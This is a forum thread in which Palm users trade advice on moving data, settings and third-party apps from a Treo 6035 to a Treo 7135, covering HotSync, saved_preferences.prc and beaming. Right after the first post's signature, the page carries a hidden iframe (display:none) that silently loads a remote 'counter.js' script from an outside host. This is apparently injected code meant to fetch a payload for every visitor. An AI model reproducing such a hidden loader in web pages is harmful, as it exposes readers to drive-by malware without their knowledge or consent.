+ Reply to Thread
    Fully Converged

Importing Data from 6035 to 7035

I searched and couldn't find the answer, so I'm asking... :angel

I have my new 7135 being delivered from Verizon next week and am wondering if there is provision for my data from the 6035 desktop s/w to be exported to the new 7135?

Thanks!

Joe<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    From the Middle of the Sea ;-)

1. When you receive your 7135, Hotsync it with the current 6035 Desktop. It will take the same user name as 6035 since you want the same data onto your new 7135. Hotsync your 6035 as well just to back up.

2. Uninstall the the old desktop before installing the new 7135 desktop from the CD.

3. Now install the new Palm Desktop for 7135.

4. You will now have Local USB as an additional menu in Hotync manager.

5. Connect the 7135 cradle over the USB port of your PC.

6. On the 7135 Grafitti area enter "shortcut..5" (Palm Launcher screen should be displayed while entring this short cut). You should hear some beep sounds then. This will erase the current user profile name from the device.

7. Next time when you Hotsync the device, it will ask you to create a new user name for the device.

8. Now you will have the same data as your 6035 but with different User Profile.

Fully Converged
    Thanks, S_M!
    Aloha,
    Joe

What is "shortcut...5"? And, you mention hotsyncing the 7135 in step one, however, not until step 5 do you plug the hotsync cradle up to the usb port. Is there a serial port cable with the 7135 also?

Thanks!
    Gadgetman

Don't follow these instructions. This is way to much work.

The only thing you need to do is install the new Palm Desktop for the 7135 over what you already have (it won't erase your profile). Then, go into your c:program filespalm<user>backup directory, and erase the saved_preferences.prc file.

Without deleting that file, you will have tons of problems. This is explained on teh tag stuck to the cradle for the 7135 when you take it out of the box.

You don't want 6035 settings in your 7135. Once you delete that file, sync the 7135 with your existing profile on the PC to get all your info and applications in the 7135.

I believe there is a whole section in the manual for "Upgrading to the 7135 from another Palm device/6035" that explains this.

Just one note to add to HoTSynC's post: Normally, the sync'ing process backs up certain applications, and the information databases that go with all other apps, but does not back up all of the third-party apps that you've put on yourself. You have the choice of either reinstalling them manually, or getting a product like Backup Buddy, installing it before you do any switching, and then doing the above. I.e., sync your 6035 one last time, making sure that BB is set to Handheld Overwrites Desktop, in order to get everything you've installed on the 6035 onto your desktop. Then delete saved_preferences.prc, and then sync the 7135, setting BB and your conduits to Desktop Overwrites Handheld for just this one time. That'll transfer it all to the 7135. Note that there is some risk that some 3rd party apps won't work right on the 7135, so be sure to test everything thoroughly if you go this route, to make sure all is well.

Fully Converged
    Gee, thanks guys. I guess I'll read the manual when it shows up.

Question on first synch from 6035 to 7135

I just got my 7135 here in Pittsburgh (I know that many of you
    have had this thing for 8 months, but just to give you an
    indication we just got "Jaws" in the theatres here), and I'm
    psyched to play with the new toy (it's charging now).

Quick question:

I'm concerned that since my 6035 has Eudora Mail 2.0.3, and the
    new phone has 2.1, that the 2.1 will overwrite the 2.0.3 (which
    is fine), but will I still have my messages in my mailbox when I
    go to open Eudora Mail for the first time?

I have searched on my computer in the Palm directory and
    subdirectories thereof, and I don't see anything that resembles
    a palm database for the Eudora Mail.

While I'm at it, are there any other items on my 6035 which I
    could lose when I perform the first synch?

Thanks in advance.

BS

DRC
    I've read here to NOT restore the two files below (found in the backup directory on the PC) from your 6035. I moved them out of backup, and synced. Worked fine for me. Got everything I had in my 6035.

networkDB and saved_preferences
    DRC

Administrator
    if at all possible, do a clean install of everything, save your addy book, memos, etc (you can beam them ). it may take a little more time but you will have a clean phone environment to start out with and you get bombarded with any freezes or legacy apps on the new phone.

As it turns out, I did lose all my mail messages (but fortunately I
    had e-mailed them to another account), and I also lost my voice
    memos, but since I still have the 6035, I can recover them. I
    like to save some of them for recording to mp3 files (especially
    when recording my drunk friends - I can e-mail them the mp3s
    in about 20 years).

BS

For those of you you who want to transfer some of your programs from your 6035 to your new 7135.....beam them....I tried it and it works great...no syncing.....took less than a minute for all o fmy apps...try it!!!!!